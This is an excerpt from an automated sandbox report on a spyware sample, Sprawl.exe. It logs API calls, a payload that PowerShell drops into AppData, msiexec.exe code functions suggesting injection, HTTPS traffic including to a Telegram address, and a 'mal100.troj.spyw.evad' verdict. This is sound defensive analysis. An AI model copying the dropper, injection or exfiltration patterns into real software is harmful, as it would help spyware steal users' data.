            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000009.00000002.3378186894.0000000022AD7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:49987 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:49986 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49988 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50023 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50025 version: TLS 1.2
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405086

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78E439 NtResumeThread,2_2_0B78E439
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_004048C50_2_004048C5
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_004064CB0_2_004064CB
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00406CA20_2_00406CA2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D2DE582_2_04D2DE58
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78D3072_2_0B78D307
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78BB142_2_0B78BB14
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78CBFB2_2_0B78CBFB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78CBF32_2_0B78CBF3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EA152_2_0B78EA15
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78CAC82_2_0B78CAC8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78BAC22_2_0B78BAC2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EABC2_2_0B78EABC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78E8042_2_0B78E804
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78D8B92_2_0B78D8B9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78DF1B2_2_0B78DF1B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78DF0B2_2_0B78DF0B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78BFF92_2_0B78BFF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78DD522_2_0B78DD52
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78CDEE2_2_0B78CDEE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78DC2C2_2_0B78DC2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78CC1B2_2_0B78CC1B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78CC132_2_0B78CC13
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78CC0B2_2_0B78CC0B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78CC032_2_0B78CC03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C3E92_2_0B78C3E9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78E25A2_2_0B78E25A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C29B2_2_0B78C29B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C28B2_2_0B78C28B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C2832_2_0B78C283
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C17B2_2_0B78C17B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C1672_2_0B78C167
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78D04D2_2_0B78D04D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C67F2_2_0B78C67F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C6772_2_0B78C677
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C6672_2_0B78C667
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C64A2_2_0B78C64A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78D6352_2_0B78D635
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C6902_2_0B78C690
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78E5F42_2_0B78E5F4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C44F2_2_0B78C44F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C4472_2_0B78C447
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C4372_2_0B78C437
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C42F2_2_0B78C42F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C4272_2_0B78C427
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AB0C2_2_0B75AB0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C3B02_2_0B75C3B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C2452_2_0B75C245
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AA4B2_2_0B75AA4B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AA3B2_2_0B75AA3B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C23B2_2_0B75C23B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B2172_2_0B75B217
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BA182_2_0B75BA18
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AA1A2_2_0B75AA1A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C2D62_2_0B75C2D6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C2CF2_2_0B75C2CF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C2AF2_2_0B75C2AF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B2AE2_2_0B75B2AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B1732_2_0B75B173
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B17B2_2_0B75B17B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B1632_2_0B75B163
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B16B2_2_0B75B16B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C1A32_2_0B75C1A3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C1AB2_2_0B75C1AB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C1932_2_0B75C193
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75C19B2_2_0B75C19B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B1832_2_0B75B183
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B0082_2_0B75B008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BF772_2_0B75BF77
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BF572_2_0B75BF57
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BF5F2_2_0B75BF5F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BF192_2_0B75BF19
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75DE682_2_0B75DE68
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75A6132_2_0B75A613
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75A6032_2_0B75A603
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75A60B2_2_0B75A60B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AEE72_2_0B75AEE7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AED72_2_0B75AED7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AEDF2_2_0B75AEDF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AEC72_2_0B75AEC7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B6C32_2_0B75B6C3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AECF2_2_0B75AECF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75A54E2_2_0B75A54E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75A5F32_2_0B75A5F3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75A5FB2_2_0B75A5FB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75ADE72_2_0B75ADE7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75A5EB2_2_0B75A5EB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AC572_2_0B75AC57
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AC5F2_2_0B75AC5F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AC472_2_0B75AC47
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AC372_2_0B75AC37
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75AC3F2_2_0B75AC3F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B41F2_2_0B75B41F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75A4D32_2_0B75A4D3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CEC1478_2_21CEC147
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CE53628_2_21CE5362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CED2788_2_21CED278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CEC4688_2_21CEC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CEC7388_2_21CEC738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CEE9888_2_21CEE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CECA088_2_21CECA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CECCD88_2_21CECCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CECFA98_2_21CECFA9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CE3E098_2_21CE3E09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CE29E08_2_21CE29E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CEE97A8_2_21CEE97A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CEF9748_2_21CEF974
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_21CE6FC88_2_21CE6FC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_032353629_2_03235362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323D2789_2_0323D278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323C1469_2_0323C146
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323C7389_2_0323C738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323C4689_2_0323C468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323CA089_2_0323CA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323E9889_2_0323E988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323CFAA9_2_0323CFAA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323CCD89_2_0323CCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_03233AA19_2_03233AA1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323F9619_2_0323F961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0323E97A9_2_0323E97A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_032369A09_2_032369A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_032339EE9_2_032339EE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_032329EC9_2_032329EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_03236FC89_2_03236FC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_03233E099_2_03233E09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_03239DE09_2_03239DE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AFC689_2_256AFC68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256ACCA09_2_256ACCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A17A09_2_256A17A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A1E809_2_256A1E80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A29689_2_256A2968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A95489_2_256A9548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AD5409_2_256AD540
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AD5509_2_256AD550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256ADDFF9_2_256ADDFF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A9C709_2_256A9C70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256ACC8F9_2_256ACC8F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AEF609_2_256AEF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AEF519_2_256AEF51
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A178F9_2_256A178F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A1E709_2_256A1E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256ADE009_2_256ADE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AE6AF9_2_256AE6AF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AE6B09_2_256AE6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AD9A89_2_256AD9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AD9999_2_256AD999
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A00409_2_256A0040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A50289_2_256A5028
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AF8029_2_256AF802
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A50189_2_256A5018
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A00129_2_256A0012
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AF8109_2_256AF810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AD0F89_2_256AD0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A93289_2_256A9328
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A0B209_2_256A0B20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A0B309_2_256A0B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AEB089_2_256AEB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A9BF79_2_256A9BF7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AF3A89_2_256AF3A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A8BA09_2_256A8BA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AF3B89_2_256AF3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256A8B919_2_256A8B91
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AE24A9_2_256AE24A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AE2589_2_256AE258
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_256AEAF89_2_256AEAF8
            Source: Sprawl.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/18@6/6
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHAutoComplete,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceExA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\Sprawl.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklensJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
            Source: C:\Users\user\Desktop\Sprawl.exeFile created: C:\Users\user\AppData\Local\Temp\nsuF132.tmpJump to behavior
            Source: Sprawl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Sprawl.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
